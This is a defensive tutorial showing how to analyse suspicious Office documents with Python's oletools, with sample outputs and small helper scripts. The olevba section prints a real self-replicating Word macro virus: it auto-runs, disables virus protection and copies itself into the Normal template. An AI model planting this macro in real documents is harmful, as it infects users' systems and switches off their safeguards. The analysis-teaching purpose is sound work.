Information security | Analyzing malicious document samples with Python oletools

Preface

Once you know the basics of the Python oletools package, you can perform a first-pass analysis of malicious document samples yourself.

What is oletools

oletools is a package of Python tools for analyzing MS OLE2 files (also known as Structured Storage or Compound File Binary Format) and MS Office documents. It is used for malware analysis, forensics and debugging.

Download and install

  • Linux, Mac: sudo -H pip install -U oletools
  • Windows: pip install -U oletools

Official website link: https://pypi.org/project/oletools/

Tool modules

Tools for analyzing malicious sample files

oleid: analyzes OLE files to detect specific characteristics commonly found in malicious files.
olevba: extracts and analyzes VBA macro source code from MS Office documents (OLE and OpenXML).
MacroRaptor (mraptor): detects malicious VBA macros.
msodde: detects and extracts DDE / DDEAUTO links from MS Office documents, RTF and CSV files.
pyxswf: detects, extracts and analyzes Flash objects (SWF) that may be embedded in MS Office documents (e.g. Word, Excel) and RTF files, which is particularly useful for malware analysis.
oleobj: extracts embedded objects from OLE files.
rtfobj: extracts embedded objects from RTF files.

Tools for analyzing OLE file structure

olebrowse: a simple GUI for browsing OLE files (e.g. MS Word, Excel, PowerPoint documents) to view and extract individual data streams.
olemeta: extracts all standard properties (metadata) from OLE files.
oletimes: extracts the creation and modification timestamps of all streams and storages.
oledir: displays all directory entries of an OLE file, including free and orphaned entries.
olemap: displays a map of all the sectors in an OLE file.

Application examples

  • Determine whether the sample contains suspicious macros (macro viruses)
python mraptor.py file.docx

Output content:

MacroRaptor 0.51 - http://decalage.info/python/oletools
This is work in progress, please report issues at https://github.com/decalage2/oletools/issues
----------+-----+----+--------------------------------------------------------
Result    |Flags|Type|File
----------+-----+----+--------------------------------------------------------
Macro OK  |---  |TXT |log.docx

Flags: A=AutoExec, W=Write, X=Execute
Exit code: 2 - Macro OK

mraptor detects most malicious VBA macros with generic heuristics rather than the signatures used by antivirus engines. It looks for three kinds of behavior: an auto-execution trigger (A), writing to the file system or memory (W), and executing a file or payload outside the VBA context (X). A macro is reported as suspicious when it has an auto-execution trigger and also writes or executes, that is, when A and (W or X) is true.
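
The decision rule above can be sketched in a few lines of Python. This is only an illustration of the A and (W or X) logic: the keyword lists below are simplified assumptions made up for this example and are not mraptor's real patterns, and the function name classify is hypothetical.

```python
import re
from typing import Tuple

# Simplified, illustrative keyword lists (assumptions, NOT mraptor's real patterns).
AUTOEXEC = re.compile(r"\b(AutoOpen|AutoExec|Auto_Open|Document_Open|Workbook_Open)\b", re.I)
WRITE = re.compile(r"\b(SaveToFile|FileCopy|CreateTextFile|URLDownloadToFile)\b", re.I)
EXECUTE = re.compile(r"\b(Shell|ShellExecute|CreateObject)\b", re.I)


def classify(vba_source: str) -> Tuple[str, bool]:
    """Return (flags, suspicious) for a piece of VBA source code.

    flags uses the same letters as the mraptor output: A, W, X or '-'.
    """
    a = bool(AUTOEXEC.search(vba_source))
    w = bool(WRITE.search(vba_source))
    x = bool(EXECUTE.search(vba_source))
    flags = ("A" if a else "-") + ("W" if w else "-") + ("X" if x else "-")
    # Suspicious only when an auto-exec trigger is combined with write or execute.
    return flags, a and (w or x)


if __name__ == "__main__":
    sample = 'Sub Document_Open()\n    Shell "cmd.exe /c calc"\nEnd Sub'
    print(classify(sample))
```

A macro that only executes something, without an auto-execution trigger, is not flagged by this rule, which is why the three flags are reported separately.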

  • Get the creation and modification times of all streams and storages in the sample
python oletimes.py file.doc

Output content:

FILE: file.doc

+----------------------------+---------------------+---------------+
| Stream/Storage name        | Modification Time   | Creation Time |
+----------------------------+---------------------+---------------+
| Root                       | 2017-01-04 02:04:53 | None          |
| '\x01CompObj'              | None                | None          |
| '\x05DocumentSummaryInform | None                | None          |
| ation'                     |                     |               |
| '\x05SummaryInformation'   | None                | None          |
| '1Table'                   | None                | None          |
| 'Data'                     | None                | None          |
| 'WordDocument'             | None                | None          |
+----------------------------+---------------------+---------------+

The timestamps reported by oletimes help when processing a large number of document samples: they let us work out the order in which the files were created and how the files relate to one another.
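
As a rough sketch of how such timestamps can be used: OLE files store them as Windows FILETIME values (100-nanosecond ticks since 1601-01-01 UTC), and a value of 0 means "not set", which is what the None entries in the table stand for. The helper names and the sample dictionary below are hypothetical, chosen only for this illustration.

```python
from datetime import datetime, timedelta

FILETIME_EPOCH = datetime(1601, 1, 1)


def filetime_to_datetime(filetime: int) -> datetime:
    """Convert a FILETIME (100 ns ticks since 1601-01-01 UTC) to a naive UTC datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def order_by_mtime(samples: dict) -> list:
    """Return sample names sorted oldest first, skipping unset (0 or None) timestamps."""
    dated = {name: ft for name, ft in samples.items() if ft}
    return sorted(dated, key=dated.get)


if __name__ == "__main__":
    # Hypothetical root-entry modification times for three samples.
    samples = {
        "a.doc": 116444736000000000 + 10_000_000,
        "b.doc": 116444736000000000,
        "c.doc": 0,  # timestamp not set
    }
    for name in order_by_mtime(samples):
        print(name, filetime_to_datetime(samples[name]))
```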

  • View the basic stream structure of the document
python oledir.py file.doc

Output content:

OLE directory entries in file file.doc:
----+------+-------+----------------------+-----+-----+-----+--------+------
id  |Status|Type   |Name                  |Left |Right|Child|1st Sect|Size
----+------+-------+----------------------+-----+-----+-----+--------+------
0   |<Used>|Root   |Root Entry            |-    |-    |3    |68      |128
1   |<Used>|Stream |Data                  |-    |-    |-    |15      |4096
2   |<Used>|Stream |1Table                |1    |6    |-    |1D      |27856
3   |<Used>|Stream |WordDocument          |2    |5    |-    |0       |10290
4   |<Used>|Stream |\x05SummaryInformation|-    |-    |-    |54      |4096
5   |<Used>|Stream |\x05DocumentSummaryInf|4    |-    |-    |5C      |4096
    |      |       |ormation              |     |     |     |        |
6   |<Used>|Stream |\x01CompObj           |-    |-    |-    |0       |110
7   |unused|Empty  |                      |-    |-    |-    |0       |0
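
To make the "1st Sect" and "Size" columns more concrete, here is a small sketch of how a stream's first sector maps to a byte offset. It rests on several assumptions that the output above does not confirm: that the "1st Sect" values are hexadecimal (as "1D" and "5C" suggest), that the file uses 512-byte sectors, and that the usual 4096-byte mini stream cutoff applies. The function name locate_stream is hypothetical.

```python
SECTOR_SIZE = 512          # assumption: 512-byte sectors, usual for .doc files
MINI_SECTOR_SIZE = 64      # mini stream sectors are 64 bytes
MINI_STREAM_CUTOFF = 4096  # streams smaller than this are kept in the mini stream


def locate_stream(first_sector_hex: str, size: int):
    """Return (container, byte_offset) of the first sector of a stream.

    Streams below the cutoff live inside the mini stream, so their offset is
    relative to the start of the mini stream, not to the start of the file.
    """
    first_sector = int(first_sector_hex, 16)
    if size < MINI_STREAM_CUTOFF:
        return "mini stream", first_sector * MINI_SECTOR_SIZE
    # Sector 0 starts right after the 512-byte file header.
    return "file", (first_sector + 1) * SECTOR_SIZE


if __name__ == "__main__":
    # Values copied from the oledir table above.
    for name, sect, size in [("1Table", "1D", 27856),
                             ("WordDocument", "0", 10290),
                             ("\\x01CompObj", "0", 110)]:
        print(name, locate_stream(sect, size))
```

Under these assumptions, WordDocument and \x01CompObj can both report first sector 0 without overlapping, because one lives in regular sectors and the other in the mini stream.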

  • View the standard properties (metadata) of the document
python olemeta.py file.doc

Output content:

FILE: file.doc

Properties from the SummaryInformation stream:
+---------------------+------------------------------+
|Property             |Value                         |
+---------------------+------------------------------+
|codepage             |936                           |
|title                |                              |
|subject              |                              |
|author               |TIPDM                         |
|keywords             |                              |
|template             |Normal.dotm                   |
|last_saved_by        |User                          |
|revision_number      |6                             |
|total_edit_time      |1740                          |
|last_printed         |2016-06-27 05:49:00           |
|create_time          |2016-07-27 23:49:00           |
|last_saved_time      |2017-01-04 02:04:00           |
|num_pages            |1                             |
|num_words            |87                            |
|num_chars            |498                           |
|creating_application |Microsoft Office Word         |
|security             |0                             |
+---------------------+------------------------------+

Properties from the DocumentSummaryInformation stream:
+---------------------+------------------------------+
|Property             |Value                         |
+---------------------+------------------------------+
|codepage_doc         |936                           |
|lines                |4                             |
|paragraphs           |1                             |
|scale_crop           |False                         |
|company              |                              |
|links_dirty          |False                         |
|chars_with_spaces    |584                           |
|shared_doc           |False                         |
|hlinks_changed       |False                         |
|version              |917504                        |
+---------------------+------------------------------+
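
Two of these values are easier to read after a little decoding. The sketch below assumes that the version property packs the major version of the writing application in its high 16 bits and the minor version in its low 16 bits, and that the codepage number maps to Python's "cp" + number codec name (936 corresponds to GBK, Simplified Chinese). Both helper names are hypothetical.

```python
import codecs


def decode_version(version: int):
    """Split the packed version property into (major, minor)."""
    return version >> 16, version & 0xFFFF


def codec_for_codepage(codepage: int) -> str:
    """Return the name of the Python codec for a Windows code page number.

    Raises LookupError if Python has no codec for that code page.
    """
    return codecs.lookup("cp%d" % codepage).name


if __name__ == "__main__":
    print(decode_version(917504))   # values taken from the olemeta output above
    print(codec_for_codepage(936))
```

With the values above, 917504 decodes to major version 14, minor version 0, which would point to the Office 2010 generation of Word if the assumption about the packing holds.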

  • Extract the macro code of the document
python olevba.py file.doc

Output content:

Flags        Filename
-----------  -----------------------------------------------------------------
OLE:MAS--B-- file.doc
===============================================================================
FILE: file.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: file.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
'APMP
'KILL
Private Sub Document_Open()
   On Error Resume Next
   Application.DisplayStatusBar = False
   Options.VirusProtection = False
   Options.SaveNormalPrompt = False
   MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 20)
   Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule
   If ThisDocument = NormalTemplate Then _
      Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule
   With Host
       If .Lines(1, 1) = "APMP" & .Lines(1, 2) <> "KILL" Then
          .DeleteLines 1, .CountOfLines
          .InsertLines 1, MyCode
          If ThisDocument = NormalTemplate Then _
             ActiveDocument.SaveAs ActiveDocument.FullName
       End If
   End With
End Sub

+------------+----------------+-----------------------------------------+
| Type       | Keyword        | Description                             |
+------------+----------------+-----------------------------------------+
| AutoExec   | Document_Open  | Runs when the Word or Publisher         |
|            |                | document is opened                      |
| Suspicious | KILL           | May delete a file                       |
| Suspicious | VBProject      | May attempt to modify the VBA code      |
|            |                | (self-modification)                     |
| Suspicious | VBComponents   | May attempt to modify the VBA code      |
|            |                | (self-modification)                     |
| Suspicious | CodeModule     | May attempt to modify the VBA code      |
|            |                | (self-modification)                     |
| Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
|            |                | may be used to obfuscate strings        |
|            |                | (option --decode to see all)            |
+------------+----------------+-----------------------------------------+

olevba is a tool for parsing OLE and OpenXML files. It extracts the VBA macro source code and helps judge whether the macros are suspicious by detecting auto-executable macros, suspicious VBA keywords, anti-sandboxing and anti-virtualization techniques, and potential IOCs (IP addresses, URLs, executable file names, etc.). It can also detect and decode several common obfuscation methods, including hex encoding, reversed strings (StrReverse), Base64, Dridex and VBA expressions, and extract IOCs from the decoded strings.
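
The idea of decoding obfuscated strings and then searching them for IOCs can be illustrated with a short sketch. This is not olevba's implementation: it only tries three of the simpler methods (reversed string, hex, Base64) on a single string literal, and the function names and the URL pattern are assumptions made for this example.

```python
import base64
import binascii
import re

URL_RE = re.compile(r"https?://\S+")


def candidate_decodings(literal: str) -> list:
    """Return (method, decoded_text) pairs for every decoding that yields printable text."""
    results = [("StrReverse", literal[::-1])]
    try:
        results.append(("Hex", bytes.fromhex(literal).decode("ascii")))
    except ValueError:  # not hex, or not ASCII once decoded
        pass
    try:
        decoded = base64.b64decode(literal, validate=True).decode("ascii")
        results.append(("Base64", decoded))
    except (binascii.Error, ValueError):  # not Base64, or not ASCII once decoded
        pass
    return [(method, text) for method, text in results if text.isprintable()]


def extract_urls(literal: str) -> list:
    """Return (method, url) pairs for URLs that appear only after decoding."""
    found = []
    for method, text in candidate_decodings(literal):
        found.extend((method, url) for url in URL_RE.findall(text))
    return found


if __name__ == "__main__":
    url = "http://example.com/a.exe"
    for literal in (url[::-1], url.encode().hex(), base64.b64encode(url.encode()).decode()):
        print(literal, "->", extract_urls(literal))
```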

  • Detect specific characteristics of documents
python oleid.py file.doc

Output content:

Filename: file.doc
+-------------------------------+-----------------------+
| Indicator                     | Value                 |
+-------------------------------+-----------------------+
| OLE format                    | True                  |
| Has SummaryInformation stream | True                  |
| Application name              | Microsoft Office Word |
| Encrypted                     | False                 |
| Word Document                 | True                  |
| VBA Macros                    | False                 |
| Excel Workbook                | False                 |
| PowerPoint Presentation       | False                 |
| Visio Drawing                 | False                 |
| ObjectPool                    | False                 |
| Flash objects                 | 0                     |
+-------------------------------+-----------------------+

oleid reports the OLE file type (MS Word, Excel, PowerPoint, etc.), whether the document contains VBA macros, embedded Flash objects or embedded OLE objects (ObjectPool), and whether it uses MS Office encryption.
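
The first indicator in the table, "OLE format", comes down to a check of the file signature. A minimal sketch of that kind of check is shown below; it only looks at the first bytes of the file and is far cruder than what oleid does. The function names and the returned labels are hypothetical.

```python
OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")  # signature of OLE2 compound files
ZIP_MAGIC = b"PK\x03\x04"                      # OpenXML documents are ZIP archives
RTF_MAGIC = b"{\\rtf"


def sniff_container(header: bytes) -> str:
    """Guess the container format from the first bytes of a file."""
    if header.startswith(OLE_MAGIC):
        return "OLE"
    if header.startswith(ZIP_MAGIC):
        return "ZIP (possibly OpenXML)"
    if header.lstrip().startswith(RTF_MAGIC):
        return "RTF"
    return "unknown"


def sniff_file(path: str) -> str:
    """Read the first 16 bytes of a file and guess its container format."""
    with open(path, "rb") as handle:
        return sniff_container(handle.read(16))
```

Checking the signature rather than the extension matters because a malicious sample can carry any file name, for example an RTF file renamed to .doc.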

Summary

The next time you come across a suspicious document sample (an attachment in an anonymous email, a file uploaded to a QQ chat group, a document shared through a cloud drive, etc.), you can use the methods above for a basic first-pass detection and analysis.
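
For a whole folder of samples, the mraptor check can be scripted. The sketch below assumes that installing oletools with pip put an mraptor command on the PATH, and that mraptor's exit codes are 0 (No Macro), 1 (Not MS Office), 2 (Macro OK, as in the output shown earlier), 10 (ERROR) and 20 (SUSPICIOUS). Only the value 2 is confirmed by this article, so check the others against your installed version. The function names are hypothetical.

```python
import subprocess
from pathlib import Path

# Assumed mraptor exit codes; only "2 - Macro OK" appears in the output above.
EXIT_CODES = {
    0: "No Macro",
    1: "Not MS Office",
    2: "Macro OK",
    10: "ERROR",
    20: "SUSPICIOUS",
}


def describe(exit_code: int) -> str:
    """Translate an mraptor exit code into a readable label."""
    return EXIT_CODES.get(exit_code, "unknown (%d)" % exit_code)


def triage(folder: str, mraptor_cmd: str = "mraptor") -> dict:
    """Run mraptor on every file in a folder and return {file name: label}."""
    results = {}
    for path in sorted(Path(folder).iterdir()):
        if path.is_file():
            proc = subprocess.run([mraptor_cmd, str(path)],
                                  capture_output=True, text=True)
            results[path.name] = describe(proc.returncode)
    return results
```

Calling triage("samples") on a folder of collected attachments returns one label per file, so that only the files marked SUSPICIOUS need a closer look with olevba.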

Keywords: Python Windows Cyber Security Information Security

Added by shaymol on Sun, 02 Jan 2022 20:50:42 +0200